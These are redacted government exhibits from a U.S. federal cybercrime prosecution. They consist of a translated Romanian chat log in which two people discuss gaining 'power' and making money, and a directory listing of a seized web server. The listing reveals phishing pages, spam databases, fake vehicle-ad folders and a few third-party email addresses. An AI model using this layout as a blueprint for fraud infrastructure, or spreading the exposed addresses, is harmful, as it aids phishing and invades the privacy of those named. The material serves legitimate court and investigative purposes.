# <u>UNITED STATES v. NICOLESCU AND MICLAUS</u>

## CASE NO. 1:16-CR-224

## GOVERNMENT'S SENTENCING MEMORANDUM

## REDACTED EXHIBITS

**GOVERNMENT
EXHIBIT**

**B**

| 26960 | romeo-mobil@r | obe.m@ro.remot | "da ciudat ca nu neau oprito si pasta" | it's weird that they didn't stop this one as well | 5/14/15 13:18 |
|---|---|---|---|---|---|
| 26961 | romeo-mobil@r | obe.m@ro.remot | "Da la from dai nu" | You're putting in the 'from,' right | 5/14/15 13:19 |
| 26962 | romeo-mobil@r | obe.m@ro.remot | "Direvt" | directly | 5/14/15 13:19 |
| 26963 | romeo-mobil@r | obe.m@ro.remot | "Whats" | Whats [sic] | 5/14/15 13:19 |
| 26964 | romeo-mobil@r | obe.m@ro.remot | "da" | yeah | 5/14/15 13:19 |
| 26965 | romeo-mobil@r | obe.m@ro.remot | "si a atins viteze record" | and it reached record speeds | 5/14/15 13:20 |
| 26966 | romeo-mobil@r | obe.m@ro.remot | "bine avem si multi" | well, we do have a lot of them | 5/14/15 13:20 |
| 26967 | romeo-mobil@r | obe.m@ro.remot | "hehe ba o sa fac p2p" | hehe, dude, I'll do p2p | 5/14/15 13:20 |
| 26968 | romeo-mobil@r | obe.m@ro.remot | "ma rog e ceba de scris" | I mean, there is a lot of writing to do | 5/14/15 13:20 |
| 26969 | romeo-mobil@r | obe.m@ro.remot | "da e mijto" | but it's cool | 5/14/15 13:20 |
| 26970 | romeo-mobil@r | obe.m@ro.remot | "ca putem folosi adminu veki" | because we can used the old admin | 5/14/15 13:20 |
| 26971 | romeo-mobil@r | obe.m@ro.remot | "cum Iam.gandit" | the way I was thinking | 5/14/15 13:20 |
| 26972 | romeo-mobil@r | obe.m@ro.remot | "asa vpsul mai duce" | this way the VPS will work | 5/14/15 13:20 |
| 26973 | romeo-mobil@r | obe.m@ro.remot | "la 100k" | [up] to 100k | 5/14/15 13:20 |
| 26974 | romeo-mobil@r | obe.m@ro.remot | "fara probleme" | without problems | 5/14/15 13:20 |
| 26975 | romeo-mobil@r | obe.m@ro.remot | "da sa nu ne taie macaroana" | let's hope we are not interrupted | 5/14/15 13:21 |
| 26976 | romeo-mobil@r | obe.m@ro.remot | "ba ej nebun" | are you crazy | 5/14/15 13:21 |
| 26977 | romeo-mobil@r | obe.m@ro.remot | "da iam.batut" | we beat them | 5/14/15 13:21 |
| 26978 | romeo-mobil@r | obe.m@ro.remot | "acu chiar avem putere" | now we really have power | 5/14/15 13:21 |
| 26979 | romeo-mobil@r | obe.m@ro.remot | "da cam putini bani" | but little money | 5/14/15 13:21 |
| 26980 | romeo-mobil@r | obe.m@ro.remot | "da avem deo paine" | but we have enough for a loaf of bread | 5/14/15 13:21 |
| 26981 | romeo-mobil@r | obe.m@ro.remot | "si cred ca e mai importanta puterea oricum" | and I think the power is more important anyway | 5/14/15 13:21 |
| 26982 | romeo-mobil@r | obe.m@ro.remot | "data trecuta aveam bani da 0 putere" | last time we had money but 0 power | 5/14/15 13:21 |
| 26983 | romeo-mobil@r | obe.m@ro.remot | "Da nush tre sa facem bani totusi" | But I don't know, we do still need to make money | 5/14/15 13:22 |
| 26984 | romeo-mobil@r | obe.m@ro.remot | "pai facem" | we will | 5/14/15 13:22 |
| 26985 | romeo-mobil@r | obe.m@ro.remot | "6000" | 6000 | 5/14/15 13:22 |

Gov. Ex. 367 Pg 733 of 734

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
.
└── fragam1
    └── home
        ├── _domain_logs
        ├── ftp
        ├── r
        └── s3
            ├── 000linkedtoweb
            │   └── my
            │       └── post
            ├── 000sites
            │   ├── 3rdlive
            │   ├── chat
            │   │   ├── ban
            │   │   ├── css
            │   │   ├── himg
            │   │   ├── img
            │   │   ├── img2
            │   │   ├── js2
            │   │   ├── js_obfs
            │   │   ├── lEtE
            │   │   ├── livetest
            │   │   │   ├── ban
            │   │   │   ├── css
            │   │   │   ├── himg
            │   │   │   ├── img
            │   │   │   ├── js
            │   │   │   ├── lEtE
            │   │   │   └── s
            │   │   │       └── 15
            │   │   └── s
            │   │       ├── 1023
            │   │       ├── 1024
            │   │       ├── 1048
            │   │       ├── 15
            │   │       ├── 2048
            │   │       ├── 3093
            │   │       ├── 3877
            │   │       ├── 4094
            │   │       ├── 5095
            │   │       ├── 666
            │   │       ├── 7024
            │   │       ├── 707
            │   │       └── 888
            ├── fb
            └── goforit
                ├── craigslist_ad
                ├── fb
                ├── fb_login
                │   └── index_files
                ├── fb_login.old
                │   └── index_files
                ├── gmail
                └── google_job
```

GOVERNMENT
EXHIBIT
1:16CR224

1126

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
            └── index_files
    ── yahoo
    ── yahoo_confirm
    │   └── resources
    ── yahoo_job
    │   └── resources
    ── yahoo_splash
        └── resources
── import-mails
── KST
│   ── careers
│   ── Ea46320maLV
│   ── image
│   │   └── cgi-bin
│   ── images
│   └── prot
── KST.bak
│   ── prot
│   └── update_tabbed
── liarshot_chat_logs
│   ── 1023
│   ── 1024
│   ── 1048
│   ── 15
│   ── 2047
│   ── 2048
│   ── 3093
│   ── 3877
│   ── 4094
│   ── 5095
│   ── 666
│   ── 7024
│   └── liarshotlogs
── MTPL
│   └── MTPL
│       ── careers
│       ── Ea46320maLV
│       ── image
│       │   └── cgi-bin
│       ── images
│       └── prot
── multiwire
│   ── careers
│   ── Ea46320maLV
│   ── images
│   └── prot
── newchat
    ── css
    ── himg
    │   └── cc
    ── img
    ── js
    ── lEtE
    └── s
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
                            ├── 1023
                            ├── 1024
                            ├── 1048
                            ├── 15
                            ├── 2047
                            ├── 2048
                            ├── 3093
                            ├── 3877
                            ├── 4094
                            ├── 5095
                            ├── 666
                            └── 7024
                └── pozayahoo
                        └── imagini
        ├── 000toberemoved
        └── 2013may27
            └── build
                ├── images
                        ├── a01bmw335i
                        ├── a01evo
                        ├── a01fordf150
                        ├── a01king
                        ├── a01mustang
                        ├── a01prius
                        ├── a01silverado
                        ├── a01tacoma
                        ├── a01x5
                        ├── flyc230
                        ├── flys430
                        ├── k0107f150
                        ├── k0155ba1
                        ├── k0155ba2
                        ├── k0155belair
                        ├── k0157ranch
                        ├── k0157tbird
                        ├── k0168camaro
                        ├── k0168mustgt
                        ├── k0169mustangr
                        ├── k0169plyrr
                        ├── k0169prr1
                        ├── k0169prr2
                        ├── k0170plygtx
                        ├── k0173challenger
                        ├── k01bmw7ar
                        ├── k0204f150
                        ├── k027ar
                        ├── k02belair
                        ├── k02cam
                        ├── k02cmr
                        ├── k02gtx
                        ├── k02mus1
                        ├── k02musgt
                        ├── k02musr
                        ├── k02must
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree

```
├── k02rr
├── k02tbird
├── k0357belair
├── k0357tbird
├── k0358mertz
├── k0369gto
├── k0369mustangR
├── k0371cuda
├── k0371novass
├── k0372chevelle
├── k0373cuda
├── k0374porsche
├── k03plygtx
├── k03plyrr
├── 10103bmw745
├── 10104f150
├── 10105gmc
├── 10105ram
├── 10106jeep
├── 10107tacoma
├── 10140ford
├── 10166nova
├── 10169chevelle
├── 10203ram3500
├── 10205ram1500
├── 10206silverado
├── 10207f150
├── 10257ranchero
├── 10269charger
├── 10269mustang
├── 10273challenger
├── 10307silverado
├── 10308crv
├── 10309f150
├── 10355belair
├── 10366nova
├── 10368charger
├── 10368gto
├── 10369mustang
├── 10370chevelle
├── 10759corvette
├── 10759corvette2
├── 10759corvette3
├── 10759corvette4
├── 107must
├── 107ply
├── 107wrangler
├── 1x0109accord
├── 1x0109f150
├── 1x0155belair
├── 1x0169charger
├── 1x0170chevelle
├── 1x0503nsx
├── 1x0506bmw
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree

```
            ├── 1x0508f150
            ├── 1x0508mitsubishi
            ├── 1x0510rubicon
            ├── 1x0566mustang
            ├── 1x0569charger
            ├── 1x0570challenger
            ├── 1x0570chevelle
            ├── 1x0609f150
            ├── 1x0610crv
            ├── 1x0667nova
            ├── 1x0668gto
            ├── 1x0669mustang
            ├── 1x0670chevelle
            ├── 1x0670chevelle2
            ├── m01ford
            ├── m01gmc
            ├── m01j16
            ├── m01j18
            ├── m01j23
            ├── m01j6
            ├── m01j9
            ├── m01ram
            ├── m01x5
            ├── m01zhp
            ├── m02bmw03
            ├── m02j23
            ├── m02m5
            ├── m10ford
            ├── m10j18
            ├── m10j9
            ├── m10quig
            ├── m10ram
            ├── m10zhp
            ├── m20gal
            ├── m21bel
            ├── m22ford
            ├── m22gmc
            ├── m22imp
            ├── m22quig
            ├── m23quig
            ├── n01chevelle
            ├── n01fairlane
            ├── n01pickup53
            ├── n02300c
            ├── n02c10
            ├── n02camaro
            ├── n02camaroo
            ├── n02charger
            ├── n02chevelle
            ├── n02f100
            ├── n02impala
            ├── n02judge
            ├── n02nova
            ├── n02ram2500
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree

```
├── n02silverado
├── n02ss350
├── n03300c
├── n03belair
├── n03camaro
├── n03challenger
├── n03challengerr
├── n03cobra
├── n03cruiser
├── n03f100
├── n03mustang
├── n03porsche
├── n04belair
├── n04belair1
├── n04bronco
├── n04camaro
├── n04challenger
├── n04charger
├── n04chevelle
├── n04fairlane
├── n04gto
├── n04modela
├── n04modela1
├── n04mustang
├── n04nova
├── n04nova1
├── n04polara
├── n04shelby
├── n05belair
├── n05chevelle
├── n05chevelleblue
├── n05modela
├── n05mustang
├── n05nova
├── n05plymouth
├── q01bel
├── q01cam
├── q01chev
├── q01gto
├── q01must
├── q01ply
├── q02camaro
├── q02chevelle
├── q02chevelle2
├── q02chevelless
├── q02duster
├── q02GTO
├── q02must
├── q02mustang
├── q02pontiac
├── t01css1
├── t01css2
├── t01cud1
├── t01dev1
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree

```
├── t01dev2
├── t01f250
├── t01gto1
├── t01imp1
├── t01imp2
├── t01nova1
├── t01x33
├── t02buk
├── t02cad
├── t02cor
├── t02cud
├── t02dod
├── t02eld
├── t02fer
├── t02gal
├── t02gto
├── t02jag
├── t02mer
├── t02mus
├── t02nova
├── t02ply
├── t02z28
├── t034drt
├── t034gtsi
├── t03css
├── t03css1
├── t03dev
├── t03mar
├── t03x33
├── t04air
├── t04air1
├── t04buk
├── t04css
├── t04f1
├── t04gto
├── t04imp
├── t04pik
├── t04spy
├── t04tra
├── t10css
├── t10cud
├── t10f250
├── t10imp
├── t10mer
├── t10mus
├── t10nov
├── t11buk
├── t11cad
├── t12cam1
├── t12cam2
├── t13drt
├── test
├── w01belair
├── w01chevy
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
├── w01f100f
├── w01f100n
├── w01impala
├── w01must
├── w01pontiac
├── w1155belair
├── w1159impala
├── w1160cryf300
├── w1164benz
├── w1165gto
├── w1169plyrr
├── w11f100fnew
├── w12bmw
├── w12chevy3100
├── w12f101new
├── w12f150f
├── w12f150old
├── w12gmcpick
├── w12hdgrav
├── w12jeeep
├── w12jeep
├── w12mustangt
├── w12tacomatoy
├── w8belair
├── w8belair2
├── w8chevy
├── w8f100flame
├── w8f100new
├── w8f150new
├── w8f150old
├── w8gto
├── w8must
├── w8toyota
├── x01b1
├── x01bmw1
├── x01bmw2
├── x01jeep1
├── x01merc1
├── x01range1
── PHPMailer
── PHPMailer_v5.1
    ├── docs
    ├── examples
    │   └── images
    ├── language
    └── test
── tmp
creators
├── aol
├── classifieds
├── cookies
├── craigs
    ├── cars
    │   └── items
```

Gov. Ex. 1126 Pg 8 of 28

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
                              └── 65_chevrolet_impala
                   ├── cron
                   │   ├── fetch_eb
                   │   ├── gather
                   │   ├── gather2
                   │   ├── gather_last
                   │   ├── keke
                   │   ├── keke_2013
                   │   ├── last_ads
                   │   ├── minolta
                   │   ├── new_ads
                   │   ├── qweaxy
                   │   ├── test
                   │   └── unknow_errors_dump_screens
                   └── jobs
           ├── craigs_phone
           │   ├── adds
           │   │   ├── blocked
           │   │   ├── new
           │   │   ├── new2
           │   │   ├── old_used
           │   │   ├── success
           │   │   └── used
           │   ├── admin
           │   ├── cookies
           │   ├── final
           │   ├── logs
           │   ├── main_logs
           │   │   ├── 1001
           │   │   ├── 19bab402
           │   │   ├── 24b01c00
           │   │   ├── 27066000
           │   │   ├── 2b57c201
           │   │   ├── 2b891400
           │   │   ├── 2b8f8600
           │   │   └── 2be88201
           │   └── unknown_pages_content
           ├── craigs.sender
           ├── created_emails
           ├── indeed
       ├── EZ2
       │   ├── images
       │   ├── include
       │   │   └── PHPMailer
       │   ├── inv
       │   └── messages
       └── mylib.old
   ├── 10000cards
   ├── 20130225spam_email_yahoo.sql
   ├── 20130308spam_email.sql
   ├── 20130330spam
   ├── 2013may27dep
   ├── 2013may27sitesnshit
   ├── 2013may27toberemoved
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
├── aol_jobs
│   ├── index_files
│   ├── logs
│   ├── prot
│   └── tmp
├── dep
├── dir
├── errors
├── fetchaols
│   └── extr
├── hack_attempts
├── hookpak
│   └── hookpak
├── indian_email.sql
├── Macros_with_login
│   └── Macros with login
│       └── Firefox4Portable
│           ├── App
│           │   ├── AppInfo
│           │   ├── DefaultData
│           │   │   ├── plugins
│           │   │   ├── profile
│           │   │   └── settings
│           │   └── Firefox
│           │       ├── components
│           │       ├── defaults
│           │       │   └── pref
│           │       ├── dictionaries
│           │       ├── extensions
│           │       │   └── {972ce4c6-7e08-4474-a285-
3208198ce6fd}
│           │       ├── searchplugins
│           │       └── uninstall
│           ├── nu_umbla_aici
│           ├── Other
│           │   ├── Help
│           │   │   └── images
│           │   └── Source
│           └── Profile1
│               ├── plugins
│               └── profile
│                   ├── bookmarkbackups
│                   ├── extensions
│                   │   └── {81BF1D23-5F17-408D-AC6B-
BD6DF7CAF670}
│                   │       ├── chrome
│                   │       ├── components
│                   │       ├── defaults
│                   │       │   └── preferences
│                   │       ├── modules
│                   │       └── samples
│                   │           ├── Datasources
│                   │           └── Macros
│                   └── firebug
```

Dreamhost - fragram1 - 67.205.14.206                     dir_tree

```
                                        ├── iMacros
                                        │   ├── Datasources
                                        │   ├── Downloads
                                        │   ├── Macros
                                        │   │   └── creators
                                        ├── minidumps
                                        ├── OfflineCache
                                        └── startupCache
                                    └── settings
                    ├── mailshit
                    ├── mar16
                    ├── my013-2999
                    ├── my2013may27
                    │   ├── 2ndlive
                    │   ├── 302forum
                    │   ├── 497652
                    │   ├── amy
                    │   ├── aol
                    │   ├── application
                    │   ├── assets
                    │   ├── attach
                    │   ├── auto
                    │   ├── buttons
                    │   ├── cgi-bin
                    │   ├── ckeditor
                    │   ├── clipboard
                    │   ├── common
                    │   ├── cookies
                    │   ├── cron
                    │   ├── css
                    │   ├── debug
                    │   ├── dialog
                    │   ├── dialogs
                    │   ├── distribute.obsolete
                    │   ├── __downloads
                    │   ├── dropbox
                    │   ├── dropbox2
                    │   ├── e
                    │   ├── enterkey
                    │   ├── extr
                    │   ├── fakeobjects
                    │   ├── firstmail
                    │   ├── footer
                    │   ├── forum
                    │   ├── image
                    │   ├── images
                    │   ├── img
                    │   ├── inlineall
                    │   ├── kodak2
                    │   ├── kodakweb
                    │   ├── lang
                    │   ├── lib
                    │   ├── link
                    │   ├── livify
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree

```
— m2
— mail
— moono
— MTPL
— multiclock
— my
— my4
— my4drone
— my4lib
— my4pub
— myextr
— mypub.old
— nicedit
— nicEditor
— off
— old
— outputxhtml
— phantomjs
— PHPMailer
— plugins
— pm
— _private
— ps
— psdrone
— pspub
— pubdrones
— py
— quepos
— s3lib
— s3pub
— s3pub.direct
— s3test
— s3tools
— samples
— skins
— so31
— sox
— sox3drone
— sox3drone.curl
— sox3ydrone.old
— soxdrone
— stopen.martin@yahoo.com
— template
— tmp
— toolbar
— tools
— uilanguages
— _vti_adm
— _vti_aut
— _vti_bin
— _vti_cnf
— _vti_log
— _vti_pvt
— _vti_txt
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
        ├── websend_files
        ├── wire
        ├── wysiwygarea
        ├── x
        └── yahoo
    ├── my2013may27.sql
    ├── mypak
    │   ├── build
    │   │   └── tmp
    │   └── tmp
    ├── my.tar
    │   └── s
    │       ├── creators
    │       │   ├── aol
    │       │   ├── classifieds
    │       │   ├── cookies
    │       │   ├── created_emails
    │       │   └── fetch_adds
    │       ├── my
    │       │   ├── 497652
    │       │   ├── dropbox
    │       │   ├── dropbox2
    │       │   └── img
    │       ├── mylib
    │       ├── mypub
    │       │   ├── cookies
    │       │   ├── py
    │       │   │   └── test
    │       │   └── tmp
    │       ├── s3
    │       ├── s3lib
    │       ├── s3pub
    │       │   └── off
    │       └── tools
    │           ├── aol
    │           ├── distribute.obsolete
    │           ├── firstmail
    │           │   └── PHPMailer
    │           ├── lib
    │           ├── multiclock
    │           ├── phantomjs
    │           ├── test
    │           └── yahoo
    │               ├── cookies
    │               ├── nicEditor
    │               └── websend_files
    ├── oldinj
    │   ├── 10
    │   ├── 2
    │   ├── 3
    │   ├── 4
    │   ├── 5
    │   ├── 6
    │   ├── 7
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
                    ├── 8
                    └── 9
            ├── perl5
            ├── peterdeck
            │   ├── css
            │   │   └── fonts
            │   ├── images
            │   └── prot
            ├── phantom.tar
            │   └── phantomjs
            │       └── items
            │           ├── keke
            │           │   ├── 57_belair
            │           │   ├── 57_tbird
            │           │   ├── 58_mercedes
            │           │   ├── 69_gto
            │           │   ├── 69_mustangR
            │           │   ├── 69_plyrr
            │           │   ├── 70_plygtx
            │           │   ├── 71_novass
            │           │   ├── 71_plycuda
            │           │   ├── 72_chevelle
            │           │   ├── 73_barracuda
            │           │   ├── 73_impala
            │           │   └── 74_porsche
            │           ├── linx
            │           │   ├── 06_ram_2500
            │           │   ├── 06_silverado
            │           │   ├── 08_crv
            │           │   ├── 09_f150
            │           │   ├── 09_tacoma
            │           │   ├── 2006_f250
            │           │   ├── 2007_silverado_1500
            │           │   ├── 2008_crv
            │           │   ├── 2008_tacoma
            │           │   ├── 2010_crv
            │           │   ├── 2010_tacoma
            │           │   ├── 55_belair
            │           │   ├── 66_nova
            │           │   ├── 67_mustang
            │           │   ├── 67_nova_ss
            │           │   ├── 68_charger
            │           │   ├── 68_gto
            │           │   ├── 69_mustang
            │           │   └── 70_chevelle
            │           └── template
            ├── phantom-workspaces
            │   └── amy
            │       ├── aol
            │       ├── indeed
            │       ├── yahoo
            │       └── yahoo.hosting
            ├── pspak
            └── pspak4-3999
```

Dreamhost - fragram1 - 67.205.14.206                     dir_tree



```
            ┌── pspak4-7999
            ├── pspak4-9999
            ├── s
            │   ├── 2ndlive
            │   ├── cgi-bin
            │   ├── cron
            │   │   └── pm
            │   ├── DenxTu -> my4pub
            │   ├── dep -> ../dep
            │   ├── __downloads
            │   ├── e
            │   │   └── amy
            │   ├── extr
            │   ├── images
            │   ├── kERleoW -> s3pub
            │   ├── kk
            │   ├── kodak
            │   │   └── kodakweb
            │   ├── kodak2
            │   │   ├── css
            │   │   ├── image
            │   │   │   └── cgi-bin
            │   │   └── images
            │   │       ├── common
            │   │       │   └── template
            │   │       └── quepos
            │   │           ├── buttons
            │   │           └── footer
            │   ├── list
            │   ├── livify
            │   ├── mail
            │   ├── MerkLorW -> pspub
            │   ├── MTPL
            │   ├── my
            │   │   ├── 497652
            │   │   ├── dropbox
            │   │   └── dropbox2
            │   │       └── img
            │   ├── my4
            │   │   ├── auto
            │   │   │   ├── attach
            │   │   │   ├── ckeditor
            │   │   │   │   ├── lang
            │   │   │   │   ├── plugins
            │   │   │   │   │   ├── clipboard
            │   │   │   │   │   │   └── dialogs
            │   │   │   │   │   ├── dialog
            │   │   │   │   │   ├── fakeobjects
            │   │   │   │   │   │   └── images
            │   │   │   │   │   └── link
            │   │   │   │   │       ├── dialogs
            │   │   │   │   │       └── images
            │   │   │   │   ├── samples
            │   │   │   │   │   ├── assets
```

Dreamhost - fragram1 - 67.205.14.206                    dlr_tree



```
                                ── inlineall
                                ── outputxhtml
                                ── uilanguages
                         ── plugins
                                ── dialog
                                       ── assets
                                ── enterkey
                                ── toolbar
                                ── wysiwygarea
                  ── skins
                         ── moono
                                ── images
          ── img
          ── logs
          ── tinyeditor
                 ── images
          ── tmp
                 ── benny@pmlcpa.com
     ── img
── my4drone
       ── debug
── my4lib
── my4pub
       ── log
       ── old
── mydrone -> sox3drone
── myextr
── mylib -> my4lib
── mypub -> my4pub
── mypub.old
       ── cookies
       ── off
       ── py
              ── test
── _private
── ps
── psdrone
       ── application
       ── forum
── pspub
       ── log
── pubdrones
       ── m2
       ── s3 -> so31
       ── so31
── s -> .
── s3
── s3lib
── s3pub
       ── off
       ── plugins
       ── tmp
── s3pub.direct
       ── tmp
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
                    ├── s3test
                    ├── s3tools
                    │   ├── post
                    │   │   └── wire
                    │   └── tmp
                    ├── sox3drone
                    │   └── forum
                    ├── sox3drone.curl
                    │   ├── s3
                    │   └── so31
                    ├── sox3drone.old
                    │   ├── 302forum
                    │   ├── m2
                    │   ├── s3
                    │   └── so31
                    ├── sox3ydrone.old
                    │   ├── s3
                    │   └── sox
                    ├── soxdrone
                    │   └── sox
                    ├── tools
                    │   ├── aol
                    │   ├── distribute.obsolete
                    │   ├── firstmail
                    │   │   └── PHPMailer
                    │   ├── gmail
                    │   ├── lib
                    │   ├── multiclock
                    │   ├── phantomjs
                    │   ├── test
                    │   └── yahoo
                    │       ├── cookies
                    │       ├── nicEditor
                    │       └── websend_files
            ├── _vti_bin
            │   ├── _vti_adm
            │   └── _vti_aut
            ├── _vti_cnf
            ├── _vti_log
            ├── _vti_pvt
            ├── _vti_txt
            └── x
    ├── s3soxid-phps
    ├── screenshots
    ├── sender
    ├── spider.sql
    ├── wire
    │   └── gather
    ├── yahooandglobal
    └── z
        └── s
            ├── creators
            │   ├── aol
            │   ├── created_emails
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
                    └── fetch_adds
            ├── my
            │   ├── 497652
            │   ├── dropbox
            │   ├── dropbox2
            │   │   └── img
            ├── mylib
            ├── mypub
            │   ├── py
            │   │   └── test
            │   └── tmp
            ├── s3
            ├── s3lib
            ├── s3pub
            ├── tools
            │   ├── aol
            │   ├── distribute
            │   ├── firstmail
            │   │   └── PHPMailer
            │   ├── lib
            │   ├── multiclock
            │   ├── phantomjs
            │   ├── test
            │   └── yahoo
            │       └── nicEditor
    ├── s3new
    │   └── s
            ├── 2ndlive
            ├── build
            │   ├── images
            │   │   ├── a01bmw335i
            │   │   ├── a01evo
            │   │   ├── a01fordf150
            │   │   ├── a01king
            │   │   ├── a01mustang
            │   │   ├── a01prius
            │   │   ├── a01silverado
            │   │   ├── a01tacoma
            │   │   ├── a01x5
            │   │   ├── flyc230
            │   │   ├── flys430
            │   │   ├── k0107f150
            │   │   ├── k0155ba1
            │   │   ├── k0155ba2
            │   │   ├── k0155belair
            │   │   ├── k0157ranch
            │   │   ├── k0157tbird
            │   │   ├── k0168camaro
            │   │   ├── k0168mustgt
            │   │   ├── k0169mustangr
            │   │   ├── k0169plyrr
            │   │   ├── k0169prr1
            │   │   ├── k0169prr2
            │   │   ├── k0170plygtx
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree

```
├── k0173challenger
├── k01bmw7ar
├── k0204f150
├── k027ar
├── k02belair
├── k02cam
├── k02cmr
├── k02gtx
├── k02mus1
├── k02musgt
├── k02musr
├── k02must
├── k02rr
├── k02tbird
├── k0357belair
├── k0357tbird
├── k0358mertz
├── k0369gto
├── k0369mustangR
├── k0371cuda
├── k0371novass
├── k0372chevelle
├── k0373cuda
├── k0374porsche
├── k03plygtx
├── k03plyrr
├── 10103bmw745
├── 10104f150
├── 10105gmc
├── 10105ram
├── 10106jeep
├── 10107tacoma
├── 10140ford
├── 10166nova
├── 10169chevelle
├── 10203ram3500
├── 10205ram1500
├── 10206silverado
├── 10207f150
├── 10257ranchero
├── 10269charger
├── 10269mustang
├── 10273challenger
├── 10307silverado
├── 10308crv
├── 10309f150
├── 10355belair
├── 10366nova
├── 10368charger
├── 10368gto
├── 10369mustang
├── 10370chevelle
├── 10759corvette
├── 10759corvette2
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree

```
                    ── 10759corvette3
                    ── 10759corvette4
                    ── 107must
                    ── 107ply
                    ── 107wrangler
                    ── 1x0109accord
                    ── 1x0109f150
                    ── 1x0155belair
                    ── 1x0169charger
                    ── 1x0170chevelle
                    ── 1x0503nsx
                    ── 1x0506bmw
                    ── 1x0508f150
                    ── 1x0508mitsubishi
                    ── 1x0510rubicon
                    ── 1x0566mustang
                    ── 1x0569charger
                    ── 1x0570challenger
                    ── 1x0570chevelle
                    ── 1x0609f150
                    ── 1x0610crv
                    ── 1x0667nova
                    ── 1x0668gto
                    ── 1x0669mustang
                    ── 1x0670chevelle
                    ── 1x0670chevelle2
                    ── m01ford
                    ── m01gmc
                    ── m01j16
                    ── m01j18
                    ── m01j23
                    ── m01j6
                    ── m01j9
                    ── m01ram
                    ── m01x5
                    ── m01zhp
                    ── m02bmw03
                    ── m02j23
                    ── m02m5
                    ── m10ford
                    ── m10j18
                    ── m10j9
                    ── m10quig
                    ── m10ram
                    ── m10zhp
                    ── m20gal
                    ── m21bel
                    ── m22ford
                    ── m22gmc
                    ── m22imp
                    ── m22quig
                    ── m23quig
                    ── n01chevelle
                    ── n01fairlane
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree

```
│  │  │    │  ├── n01pickup53
│                ├── n02300c
│                ├── n02c10
│                ├── n02camaro
│                ├── n02camaroo
│                ├── n02charger
│                ├── n02chevelle
│                ├── n02f100
│                ├── n02impala
│                ├── n02judge
│                ├── n02nova
│                ├── n02ram2500
│                ├── n02silverado
│                ├── n02ss350
│                ├── n03300c
│                ├── n03belair
│                ├── n03camaro
│                ├── n03challenger
│                ├── n03challengerr
│                ├── n03cobra
│                ├── n03cruiser
│                ├── n03f100
│                ├── n03mustang
│                ├── n03porsche
│                ├── n04belair
│                ├── n04belair1
│                ├── n04bronco
│                ├── n04camaro
│                ├── n04challenger
│                ├── n04charger
│                ├── n04chevelle
│                ├── n04fairlane
│                ├── n04gto
│                ├── n04modela
│                ├── n04modela1
│                ├── n04mustang
│                ├── n04nova
│                ├── n04nova1
│                ├── n04polara
│                ├── n04shelby
│                ├── n05belair
│                ├── n05chevelle
│                ├── n05chevelleblue
│                ├── n05modela
│                ├── n05mustang
│                ├── n05nova
│                ├── n05plymouth
│                ├── q01bel
│                ├── q01cam
│                ├── q01chev
│                ├── q01gto
│                ├── q01must
│                ├── q01ply
│  │  │    │  ├── q02camaro
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree

```
├── q02chevelle
├── q02chevelle2
├── q02chevelless
├── q02duster
├── q02GTO
├── q02must
├── q02mustang
├── q02pontiac
├── t01css1
├── t01css2
├── t01cud1
├── t01dev1
├── t01dev2
├── t01f250
├── t01gto1
├── t01imp1
├── t01imp2
├── t01nova1
├── t01x33
├── t02buk
├── t02cad
├── t02cor
├── t02cud
├── t02dod
├── t02eld
├── t02fer
├── t02gal
├── t02gto
├── t02jag
├── t02mer
├── t02mus
├── t02nova
├── t02ply
├── t02z28
├── t034drt
├── t034gtsi
├── t03css
├── t03css1
├── t03dev
├── t03mar
├── t03x33
├── t04air
├── t04air1
├── t04buk
├── t04css
├── t04f1
├── t04gto
├── t04imp
├── t04pik
├── t04spy
├── t04tra
├── t10css
├── t10cud
├── t10f250
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree

```
                          ├── t10imp
                          ├── t10mer
                          ├── t10mus
                          ├── t10nov
                          ├── t11buk
                          ├── t11cad
                          ├── t12cam1
                          ├── t12cam2
                          ├── t13drt
                          ├── test
                          ├── w01belair
                          ├── w01chevy
                          ├── w01f100f
                          ├── w01f100n
                          ├── w01impala
                          ├── w01must
                          ├── w01pontiac
                          ├── w1155belair
                          ├── w1159impala
                          ├── w1160cryf300
                          ├── w1164benz
                          ├── w1165gto
                          ├── w1169plyrr
                          ├── w11f100fnew
                          ├── w12bmw
                          ├── w12chevy3100
                          ├── w12f101new
                          ├── w12f150f
                          ├── w12f150old
                          ├── w12gmcpick
                          ├── w12hdgrav
                          ├── w12jeeep
                          ├── w12jeep
                          ├── w12mustangt
                          ├── w12tacomatoy
                          ├── w8belair
                          ├── w8belair2
                          ├── w8chevy
                          ├── w8f100flame
                          ├── w8f100new
                          ├── w8f150new
                          ├── w8f150old
                          ├── w8gto
                          ├── w8must
                          ├── w8toyota
                          ├── x01b1
                          ├── x01bmw1
                          ├── x01bmw2
                          ├── x01jeep1
                          ├── x01merc1
                          └── x01range1
              ├── PHPMailer
              ├── PHPMailer_v5.1
                          ├── docs
```

Dreamhost - fragram1 - 67.205.14.206                    dir_tree



```
                    ├── examples
                    │   └── images
                    ├── language
                    ├── test
                    └── tmp
        ├── cgi-bin
        ├── creators
        │   ├── aol
        │   ├── classifieds
        │   ├── cookies
        │   ├── craigs
        │   │   ├── cars
        │   │   │   └── items
        │   │   │       └── 65_chevrolet_impala
        │   │   ├── cron
        │   │   │   ├── fetch_eb
        │   │   │   ├── gather
        │   │   │   ├── gather2
        │   │   │   ├── gather_last
        │   │   │   ├── keke
        │   │   │   ├── keke_2013
        │   │   │   ├── last_ads
        │   │   │   ├── minolta
        │   │   │   ├── new_ads
        │   │   │   ├── qweaxy
        │   │   │   ├── test
        │   │   │   └── unknow_errors_dump_screens
        │   │   └── jobs
        │   ├── craigs_phone
        │   │   ├── adds
